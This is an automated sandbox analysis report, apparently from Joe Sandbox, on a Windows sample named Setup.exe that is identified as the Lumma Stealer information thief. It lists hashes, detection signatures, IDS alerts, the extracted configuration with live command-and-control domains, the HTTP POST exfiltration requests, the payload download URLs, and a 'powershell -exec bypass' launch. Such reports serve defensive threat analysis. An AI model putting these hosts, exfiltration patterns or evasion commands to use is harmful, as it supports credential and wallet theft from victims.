Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:Setup.exe
Analysis ID:1580125
MD5:79c238ebe5c951b14e9e4729ce73fcc9
SHA1:87b1590ebd335e94594e654d1c78ce08067d9d1f
SHA256:09c43883e99bf9db74a86431dec7827fa5e112afe0e7efe952f4f50be249c4a6
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sigma detected: Suspicious PowerShell Parameter Substring
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Setup.exe (PID: 6596 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 79C238EBE5C951B14E9E4729CE73FCC9)
    • powershell.exe (PID: 3720 cmdline: powershell -exec bypass error code: 523 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["wordyfindy.lat", "beefshooti.click", "curverpluch.lat", "talkynicer.lat", "shapestickyr.lat", "bashfulacid.lat", "tentabatte.lat", "manyrestro.lat", "slipperyloo.lat"], "Build id": "jMw1IE--BARNI"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1903279526.000000000105D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1905498616.0000000001066000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
          • 0x49bc9:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
          Process Memory Space: Setup.exe PID: 6596JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: Setup.exe PID: 6596JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 1 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass error code: 523, CommandLine: powershell -exec bypass error code: 523, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 6596, ParentProcessName: Setup.exe, ProcessCommandLine: powershell -exec bypass error code: 523, ProcessId: 3720, ProcessName: powershell.exe
              Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass error code: 523, CommandLine: powershell -exec bypass error code: 523, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 6596, ParentProcessName: Setup.exe, ProcessCommandLine: powershell -exec bypass error code: 523, ProcessId: 3720, ProcessName: powershell.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass error code: 523, CommandLine: powershell -exec bypass error code: 523, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup.exe", ParentImage: C:\Users\user\Desktop\Setup.exe, ParentProcessId: 6596, ParentProcessName: Setup.exe, ProcessCommandLine: powershell -exec bypass error code: 523, ProcessId: 3720, ProcessName: powershell.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T01:12:16.539512+010020283713Unknown Traffic192.168.2.449730104.21.18.185443TCP
              2024-12-24T01:12:18.574856+010020283713Unknown Traffic192.168.2.449731104.21.18.185443TCP
              2024-12-24T01:12:20.987785+010020283713Unknown Traffic192.168.2.449732104.21.18.185443TCP
              2024-12-24T01:12:23.709376+010020283713Unknown Traffic192.168.2.449734104.21.18.185443TCP
              2024-12-24T01:12:26.423291+010020283713Unknown Traffic192.168.2.449738104.21.18.185443TCP
              2024-12-24T01:12:29.474434+010020283713Unknown Traffic192.168.2.449740104.21.18.185443TCP
              2024-12-24T01:12:31.599207+010020283713Unknown Traffic192.168.2.449742104.21.18.185443TCP
              2024-12-24T01:12:33.567801+010020283713Unknown Traffic192.168.2.449743104.21.18.185443TCP
              2024-12-24T01:12:35.868046+010020283713Unknown Traffic192.168.2.449744104.21.27.229443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T01:12:17.295364+010020546531A Network Trojan was detected192.168.2.449730104.21.18.185443TCP
              2024-12-24T01:12:19.337254+010020546531A Network Trojan was detected192.168.2.449731104.21.18.185443TCP
              2024-12-24T01:12:34.346561+010020546531A Network Trojan was detected192.168.2.449743104.21.18.185443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T01:12:17.295364+010020498361A Network Trojan was detected192.168.2.449730104.21.18.185443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T01:12:19.337254+010020498121A Network Trojan was detected192.168.2.449731104.21.18.185443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T01:12:22.279186+010020480941Malware Command and Control Activity Detected192.168.2.449732104.21.18.185443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://klipcatepiu0.shop:443/int_clp_ldr_sha.txtAvira URL Cloud: Label: malware
              Source: https://klipcatepiu0.shop/int_clp_ldr_sha.txtAvira URL Cloud: Label: malware
              Source: https://klipcatepiu0.shop/int_clp_ldr_sha.txtDZAvira URL Cloud: Label: malware
              Source: https://neqi.shop/sdgjyut/psh.txtAvira URL Cloud: Label: malware
              Source: https://klipcatepiu0.shop/Avira URL Cloud: Label: malware
              Source: https://klipcatepiu0.shop/hBAvira URL Cloud: Label: malware
              Source: https://neqi.shop/sdgjyut/psh.txtMAvira URL Cloud: Label: malware
              Source: https://neqi.shop:443/sdgjyut/psh.txtAvira URL Cloud: Label: malware
              Source: https://klipcatepiu0.shop/int_clp_ldr_sha.txtSAvira URL Cloud: Label: malware
              Source: https://neqi.shop/sdgjyut/psh.txtf5Avira URL Cloud: Label: malware
              Source: Setup.exe.6596.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["wordyfindy.lat", "beefshooti.click", "curverpluch.lat", "talkynicer.lat", "shapestickyr.lat", "bashfulacid.lat", "tentabatte.lat", "manyrestro.lat", "slipperyloo.lat"], "Build id": "jMw1IE--BARNI"}
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
              Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.27.229:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2026381820.0000000006D1A000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov esi, edx0_2_00F5A0FC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00F6E0DC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7Dh]0_2_00F6E0DC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edi+2845CE35h]0_2_00F69090
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 73B6CFD8h0_2_00F69090
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov byte ptr [edx], bl0_2_00F7C057
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov ecx, eax0_2_00F74048
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov eax, ecx0_2_00F68033
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+1Ch]0_2_00F7300C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then jmp eax0_2_00F7A1BA
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_00F7B17C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 73004FCFh0_2_00F6B12C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-000000ABh]0_2_00F6B12C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], D6A985C1h0_2_00F6B12C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi+2845CDC9h]0_2_00F6B12C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 5E874B5Fh0_2_00F6B12C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 5E874B5Fh0_2_00F6B12C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 888A0AE0h0_2_00F6B12C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], D6A985C1h0_2_00F6B12C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]0_2_00F702EC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov edi, eax0_2_00F8C2C5
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00F7C284
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov edx, ecx0_2_00F8D24C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ecx, cx0_2_00F7E24B
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ecx, word ptr [esi+eax]0_2_00F733FC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx+02h]0_2_00F773EC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00F7D3D1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00F7D3D1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov dword ptr [esp], edx0_2_00F7D3D1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], FAD59DE2h0_2_00F683A2
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+05h]0_2_00F7939C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_00F8D4FC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_00F7B47C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h0_2_00F79554
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_00F6753E
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 29FCC5D8h0_2_00F68698
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+02h]0_2_00F5A64C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_00F5A64C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov byte ptr [ecx], al0_2_00F5E638
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov edi, ecx0_2_00F5E638
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1Ch]0_2_00F7A60C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 3FE33C50h0_2_00F687EC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [edx+ebp*8], C72EB52Eh0_2_00F8A79C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movsx ecx, byte ptr [esi]0_2_00F8C74C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then lea esi, dword ptr [esp+00000098h]0_2_00F68748
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00F688DE
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-000000A8h]0_2_00F8884F
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+28h]0_2_00F7782C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]0_2_00F7482C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]0_2_00F7482C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+4A96EB48h]0_2_00F8E97C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then lea eax, dword ptr [eax+eax*4]0_2_00F5992C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp cl, 0000002Eh0_2_00F77A9B
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00F84A6C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [eax], dx0_2_00F66A5E
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+06h]0_2_00F79BE9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00F79BE9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00F79BE9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov ebx, dword ptr [esp]0_2_00F79B60
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+4A96EB48h]0_2_00F8EB0C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edi+2845CE35h]0_2_00F68CEB
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 73B6CFD8h0_2_00F68CEB
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [edi], ax0_2_00F8BCE6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-7994E9ADh]0_2_00F7BCDC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_00F58C6C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]0_2_00F58C6C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [edi], ax0_2_00F76C6A
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp byte ptr [eax+ecx+23h], 00000000h0_2_00F5BC1F
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov edx, ecx0_2_00F87DEC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then test eax, eax0_2_00F87DEC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp al, 5Ch0_2_00F53DDC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [edi], cx0_2_00F6DD5A
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_00F77D17
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+74h]0_2_00F5AD0C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov word ptr [edi], ax0_2_00F5AD0C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then lea eax, dword ptr [esi+20h]0_2_00F5CE7F
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then lea eax, dword ptr [esi+20h]0_2_00F5CE7F
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then push eax0_2_00F5CFFA
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]0_2_00F89FEC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], E1A2961Bh0_2_00F8BF70
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00F7DF2C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-0CB4AF98h]0_2_00F7DF2C

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49732 -> 104.21.18.185:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.18.185:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.18.185:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 104.21.18.185:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.18.185:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.18.185:443
              Source: Malware configuration extractorURLs: wordyfindy.lat
              Source: Malware configuration extractorURLs: beefshooti.click
              Source: Malware configuration extractorURLs: curverpluch.lat
              Source: Malware configuration extractorURLs: talkynicer.lat
              Source: Malware configuration extractorURLs: shapestickyr.lat
              Source: Malware configuration extractorURLs: bashfulacid.lat
              Source: Malware configuration extractorURLs: tentabatte.lat
              Source: Malware configuration extractorURLs: manyrestro.lat
              Source: Malware configuration extractorURLs: slipperyloo.lat
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.18.185:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.18.185:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.18.185:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.18.185:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.18.185:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.18.185:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.18.185:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.18.185:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.27.229:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: beefshooti.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 79Host: beefshooti.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GBWXKW47DFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18115Host: beefshooti.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=H7H31ZUGFVXUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8748Host: beefshooti.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=B5HRORPDBHHCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20401Host: beefshooti.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2M7NPPXJMWSGOFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1231Host: beefshooti.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O72ZSG6XGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1064Host: beefshooti.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 114Host: beefshooti.click
              Source: global trafficHTTP traffic detected: GET /sdgjyut/psh.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: neqi.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /sdgjyut/psh.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: neqi.shop
              Source: global trafficDNS traffic detected: DNS query: beefshooti.click
              Source: global trafficDNS traffic detected: DNS query: neqi.shop
              Source: global trafficDNS traffic detected: DNS query: klipcatepiu0.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: beefshooti.click
              Source: Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: powershell.exe, 00000004.00000002.2018847996.0000000004A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
              Source: powershell.exe, 00000004.00000002.2023537372.0000000005598000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
